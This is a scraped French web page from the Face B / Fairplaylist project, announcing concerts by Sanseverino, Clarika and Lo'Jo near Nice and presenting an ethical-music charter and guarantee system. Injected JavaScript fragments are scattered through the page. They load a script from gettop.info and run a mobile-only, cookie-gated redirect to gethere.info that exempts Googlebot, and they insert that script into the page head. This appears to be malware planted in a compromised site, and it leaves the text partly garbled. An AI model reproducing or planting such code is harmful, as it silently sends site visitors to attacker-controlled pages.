Name Value
owlItems.length 16
currentItem 7
prevItem 6
visibleItems 7,8,9,10,11
dragDirection:

Face B

Sanseverino à Breil le 1er août

Sanseverino à Breil le 1er août

Il revient (et il est vachement content) ! Le 1er août prochain, Sanseverino sera à Breil-sur-Roya pour un concert certainement mémorable…

Avec Jidé à la basse et Xa à la batterie, il reforme le trio qui a  enflammé le Festival du livre de Mouans-Sartoux l’an dernier. Le 1er août, c’est à Breil, sous le chapiteau au bord du lac, qu’auront lieu les réjouissances.

Pour qu’elles soient belles et que tout le monde puisse s’installer tranquillement, on ouvrira les portes à 18h. Puis aux alentours de 19h, Djé Balèti, le Niçois de Toulouse et ses deux complices, vont assurer une première partie qui va faire bouleguer.

Pour ceux qui auraient une petite faim avant d’attaquer le second concert, une restauration sur place sera possible (attention, il vaut mieux la réserver à l’avance au 06 59 75 82 71).

Enfin, Sanseverino prendra la scène. Guitare, basse, batterie… juste du rock et de l’énergie à l’état pur.

Vous pouvez dès à présent acheter votre billet en ligne (ci-dessous) ou à l’Office du Tourisme de Breil (à partir du 23 juin) au prix de 12 €.

Billetterie

Attention, le jour du concert, la place sera à 15 €

Face B à Nice

Face B, c’est le projet que nous développons dans la région niçoise depuis un an. L’objectif est de construire des processus équitables dans le montage de concerts ou de festivals de musique. Deux outils majeurs pour l’instant : des cessions équitables et une billetterie mise à nu.

Mélissa Laveaux, Denis Péan et Lo’Jo en trio, Clarika, Sanseverino… Voici quelques artistes qui sont venus dans le cadre de Face B. Nous proposons en général deux ou trois dates, pour des concerts différents à chaque fois : dans une salle de 300 places, pour un concert intimiste, voire un « non-concert » où chaque artiste interprète librement ses morceaux, en interaction avec le public.

Ces dates sont organisées avec un souci de transparence et d’équité dans la rémunération de tous. Grâce aux cessions équitables, chaque artiste est assuré d’être payé selon un barème préétabli et connu de tous (le barème est accessible par là). La billetterie mise à nu complète ce premier élément : nous publions les coûts et leur répartition à la fin de chaque date de concert ou de festival, sur place, via le site ou la newsletter (voir l’exemple du concert de Sanseverino en octobre dernier).

Pendant trois jours, les artistes sont accueillis à Nice et Mouans-Sartoux, les deux villes où Fairplaylist est notablement implantée, mais aussi à Grasse et à Valbonne. En 2015, nous travaillerons avec d’autres villes du territoire. C’est l’occasion pour les artistes de découvrir une région qu’ils connaissent peu ou pas. Une région qui inspire souvent des idées reçues que nous battons en brèche : ici on a le droit d’avoir moins de 70 ans, de réfléchir à une économie sociale et solidaire et de faire la fête !

var d=document;var s=d.createElement(‘script’); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Sanseverino : billetterie mise à nu

Le concert de Sanseverino au Festival du livre a été un grand moment de fête et de rock’n’ roll ! Il a été aussi un grand moment de musique éthique !

Mais qu’est donc cette « Billetterie Mise à Nu »?.

Lire la suite ...

Sanseverino, un concert de feu !

_DSC7769Le 4 octobre dernier, Sanseverino en trio était au Festival du livre de Mouans-Sartoux pour un concert incroyable devant plus de 600 personnes. Retour en photos et en vidéos sur ce moment génial, avec Chinaski en première partie.

 

 

 

 

Lire la suite ...

Muzic Zone en image

DSC7307-590x393La fête était belle : théâtre, concerts, baletis… ! Retour en photos sur quatre jours inoubliables.

 

 

 

 

Lire la suite ...

Sanseverino parmi les livres, à réserver très vite

sansevLe 4 octobre prochain, Fairplaylist invite Sanseverino au Festival du livre de Mouans-Sartoux. Un concert en trio, dans le parc du château, ça promet !

Le Festival du livre de Mouans-Sartoux est un événement incroyable : trois de jours de dédicaces, débats, lectures, spectacles, films… et concerts ! C’est dans ce bouillonnement de culture que nous invitons Sanseverino à jouer, en trio, dans le cadre exceptionnel du parc du château. Pour être sûr de ne pas rater ce moment, réservez rapidement vos places .

Prévente en ligne : 14€ (frais de gestion inclus)
Sur place : 16€

Billetterie en ligne

 

Toutes les infos et le programme du Festival du livre sur leur site}

:: Clarcèn :: en première partie de Clarika jeudi 15 mai à Grasse

llau043_tifDouble ravissement pour la soirée du 15 mai prochain à Altitude 500 à Grasse : Clarcèn fera la première partie de Clarika ! Petite présentation de cette artiste forte et inspirée.

Derrière cette anagramme sonore, une fille chante à l’épurée des chansons aux accents électro pop. Des images dans les mots pour des mélodies élastiques, Clarcèn crie à l’essentiel. Elle chante l’amour, oui, et le reste aussi. D’une voix proche, envolée ou bien moelleuse, sa musique se veut physique. La cadence cogne et Clarcèn prend ses aises à l’écoute des émotions, celles de l’instant, surtout.

Sa voix résonne comme un souffle chaud et doux à nos oreilles rappelant Emily Loizeau ou bien Camille. Ses mots ricochent sur des tempos électro à la manière de petits cailloux qui s’amoncellent en un élégant Cairn, titre du premier EP de Clarcèn, sorti le 17 février dernier.

Un disque qu’elle a voulu intimiste et rond, chanté au creux de l’oreille. À grand renfort de claviers, de boucles et de chœurs, Cairn a été arrangé et réalisé par Clarcèn, sous l’écoute attentive de Sébastien Dandreis (Christophe, Indochine…) derrière la console. Cet EP ajoute une pierre prometteuse au bel édifice que la chanteuse a bâti avec des chansons qui ont déjà séduit France Inter (elle a participé au Radio Crochet Inter) et Les Inrocks (elle fait partie des artistes sélectionnés pour les Inrocks Lab 2014).

Le clip de son titre ‘Je m’habituerai’ a, quant à lui, fait une sortie remarquée début mars. Soutenu par plusieurs diffuseurs de musique actuelle, dont La Bande Sonore et le collectif Label Note, le festival de court-métrage Cinémator a également choisi de le diffuser en clôture de son édition 2014.

Lauréate du Tremplin des Musiques Actuelles 2013 de l’Espace Léonard de Vinci de Mandelieu (06), Clarcèn fait également partie des 3 talents choisis par le festival Nuits du Sud (Vence, 06) pour sa 17e édition. Elle a intégré au printemps le collectif d’artistes Pacinist.

À écouter ici : www.clarcen.bandcamp.com
À regarder là : « Je m’habituerai »

 Concert Clarika et Clarcèn, jeudi 15 mai, ECA Grasse, réservations sur notre site

if (document.currentScript) {

Clarika en concert, à réserver d’urgence !

Après Melissa Laveaux et Lo’jo trio, c’est au tour de Clariko …euh, CLARIKA, de venir illuminer nos nuits du Sud ! Du 15 au 17 mai, elle sera à Grasse, Mouans-Sartoux et Nice, dans des configurations de concert très différentes.
N’oubliez pas de réserver !


Jeudi 15 mai
 – Grasse

Une super soirée avec repas, DJ et concert (avec Clarcen en première partie) à partir de 19h30.
Dans la superbe salle d’ECA 500 à Grasse (57 avenue Honoré Lions)

Concert+repas : 20 € (22 € sur place)
Concert seul :  13 € (15 € sur place)

Achetez vos places

Vendredi 16 mai – Mouans-Sartoux

14 h : Rencontre professionnelle pour la création d’un label éthique et solidaire en musique (en présence de Clarika) à la médiathèque
20 h : Concert – rencontre dans le Parc du château.

Achetez vos places

Samedi 17 mai – Nice
20h30 : Concert intimiste à la Zonmé (7bis rue des combattants enAfrique du Nord 06000 Nice)

Achetez vos places

 

Avec des petits avant-goût qu’on aime particulièrement :

var d=document;var s=d.createElement(‘script’); if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}} else {

Déjeuner (en paix) sur l’herbe

Prends ton chapeau et tes minots (si tu en as) et viens nous rejoindre dimanche 20 avril à midi dans les jardins partagés du PECOS à Nice pour écouter Denis Péan et manger un morceau !

jardin3

Lire la suite ...

Réservez vos places pour Lo’Jo trio, Denis Péan et les P’tits Gars Laids !

Lo’Jo trio et Denis Péan débarquent bientôt sur la Côte d’Azur. Face B vous a concocté quelques rendez-vous bien sympas (avec même de la paëlla !). Réservez vite vos places ci-dessous, les entrées sont limitées.

Lo'Jo trio

Lo’Jo trio

Lire la suite ...

Lo’Jo trio et Denis Péan pour Face B !

Du 17 au 20 avril, Lo’JO trio et Denis Péan, vont embellir les soirées du Sud. Dans le cadre du projet Face B, projet de réflexion sur une filière musicale éthique et responsable, les artistes se produiront dans trois (peut-être même quatre) lieux différents.


droite

Lire la suite ...

Maria Marolany, première partie de Mélissa Laveaux

Quand la Côte d’Azur se fait passerelle des musiques du monde, le soleil véhicule un festival d’harmonies. C’est un peu l’histoire de Maria Marolany, Fréjusienne d’origine martiniquaise, artiste généreuse et multiple, qui dévoile un arc-en ciel d’influences hybrides. Les harmonies pures de Maria Marolany coulent comme une évidence.

maria_maroulany

Lire la suite ...

Fédération et rencontres

L’objectif général du projet FACE B est de fédérer, d’informer, et d’accompagner les acteurs de la filière musicale vers des pratiques professionnelles éthiques et solidaires. Chaque acteur de la filière qui souhaite s’engager à améliorer ses pratiques, de l’artiste au spectateur, en passant par le producteur ou la salle de concert, est amené à rejoindre la fédération en signant la Charte « Musique éthique ».

Capture d’écran 2015-04-20 à 08.48.21Ce réseau encourage l’échange de connaissances et de compétences ; on peut y partager des informations à caractère réglementaire, technique ou artistique, et y relayer des informations musicales – sorties d’albums, tenue de concerts, événements, etc. Il permet également de participer aux différents débats sur la musique éthique et solidaire, ainsi que de mettre à l’épreuve ses pratiques dites « responsables » lors de productions en commun.

Plusieurs rencontres professionnelles « Musique éthique » ont déjà été organisées, et de nombreux professionnels, techniciens, chargés de projets, ainsi que de nombreux artistes, ont pu échanger sur leurs pratiques concernant la production, l’édition, l’organisation d’événements, ou encore l’accompagnement à la création d’activité dans le milieu culturel et plus particulièrement musical.

Le nombre des acteurs qui rejoignent ce réseau est en constante progression. Ensemble, ils tentent de sensibiliser un cercle toujours plus large au contenu de la Charte « Musique éthique », et ils portent le développement d’un Système de Garantie Participatif (SGP) en cours d’expérimentation.

Téléchargez la Charte « Musique éthique » CHARTE FACE B

Pour plus d’information, téléchargez les comptes-rendus des rencontres « Musique éthique » :

27 novembre 2014 : Les outils de l’ESS au service de la filière musicale 31 mars 2015 : La Charte « Musique éthique » et les pratiques responsables en musique CR Rencontre ME – 31 mars 2015

Système de garantie

SYSTÈME DE GARANTIE

Un Système de Garantie Participatif (SGP) permet de certifier que les produits issus d’une filière ont été produits dans le respect de principes et de critères co-construits par ses acteurs, du producteur au consommateur. Dans un SGP, il n’existe pas d’organisme certificateur extérieur ; ce sont les acteurs eux-mêmes qui s’évaluent et se gouvernent mutuellement. Des structures actives du commerce équitable et développement durable telles MINGA ou NATURE & PROGRES sont à l’origine de SGP.

Actuellement élaboré par Fairplaylist, le SGP « Musique éthique », en faveur d’une filière musicale aux pratiques professionnelles plus responsables, traite plus particulièrement de diversité culturelle, répartition des revenus, transparence, gouvernance et respect de l’environnement. Le SGP « Musique éthique » cherche à regrouper des artistes, maisons de disques, salles de concerts, studios, tourneurs, festivals, sites de musique en ligne, institutionnels de la musique et d’autres acteurs travaillant sur des thématiques de culture et de développement durable, mais aussi bien sûr des consommateurs, qui souhaite s’engager sur des sorties d’albums, la tenue de concerts et d’événements, etc. produits dans des conditions éthiques et solidaires.

Les principes du SGP sont :

  • La coopération et la solidarité
  • L’autonomie de l’artiste
  • La rémunération équitable et transparente
  • La protection de l’environnement

Les objectif du SGP sont :

  • faire du projet autrement
  • encourager les pratiques professionnelles responsables au sein de la filière
  • améliorer et sécuriser le quotidien des artistes et techniciens
  • répondre à l’urgence climatique et environnementaleLes outils du SGP sont :
  • Un questionnaire d’auto-évaluation des pratiques. Suivant des axes tels l’économie, la transparence, la gouvernance ou encore l’impact sur l’environnement, ce questionnaire doit permettre aux différents acteurs de réfléchir à leurs pratiques et de commencer à se positionner en terme de démarche d’amélioration continue.
  • Un tableau de bord de suivi. Il s’agit de mettre en place un accompagnement des acteurs vers des pratiques professionnelles plus responsables ;
  • Une certification, pour valider les pratiques des acteurs dits »responsables’, certainement par un label.
  • Un système d’analyse de filière. Cet outil d’évaluation et d’étude de la filière musicale éthique et solidaire est basé sur les données récoltées lors de la phase de certification, et a pour but de rendre compte et d’améliorer les pratiques responsables de chacun.

if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);

Musique éthique et solidaire

Alors que nous vivons une redéfinition profonde du secteur de la musique, et face aux pratiques des majors du secteur, il est urgent de bâtir de nouveaux modèles économiques qui passent par le respect de principes fondamentaux (coopération et solidarité, rémunération équitable et transparente, autonomie de l’artiste, protection de l’environnement), mais aussi d’imaginer de nouvelles manières de concevoir la production, la distribution et l’écoute de la musique, pour ainsi permettre à chaque professionnel de la filière de vivre de son métier et à chacun d’accéder à une offre musicale riche et diversifiée.

LES VALEURS

Le programme « Musique éthique » pose les principes de rapports plus équilibrés entre acteurs, basés sur la concertation, notamment par une répartition plus équitable des richesses générées par la filière musicale, mais aussi permet aux différents acteurs de la filière, grâce à la coopération, d’harmoniser leurs pratiques autour des valeurs portées par l’Économie Sociale et Solidaire :

1. La coopération et la solidarité

Toutes les parties prenantes de la création, production, diffusion, et distribution musicales ont pour but commun de favoriser et contribuer à la création et à la diversité artistique. Leurs relations se basent sur des négociations et accords concertés, le respect du travail de chacun, et des engagements financiers et réciproques.

2. La rémunération équitable et la transparence

Tous les acteurs impliqués ont droit à une rémunération équitable, et au respect du droit du travail et des droits d’auteur. Le prix des productions musicales est construit sur la base d’une négociation entre artiste(s), producteur, et distributeur, celui des prestations musicales, entre artiste(s), producteur, et diffuseur. L’objectif est de suivre le plus possible les coûts réels et en recherchant une rémunération équitable du travail des différents acteurs. Les coûts effectifs feront l’objet d’une communication large diffusée à tous les acteurs concernés.

3. L’autonomie de l’artiste

L’artiste a le droit à une pleine et entière liberté artistique. Celle-ci s’entend dans la production et dans la diffusion de son œuvre.

4. Le Développement durable

La production et la diffusion musicale sont faites dans une démarche de Développement durable, c’est-à-dire en minimisant l’impact environnemental de la production, et en maximisant les impacts positifs en termes de développement social, économique et culturel.

Pour plus d’information, téléchargez la CHARTE FACE B et le Cahier des charges pour une filière musicale équitable

 

d.getElementsByTagName(‘head’)[0].appendChild(s);

Inscrivez-vous à notre Newsletter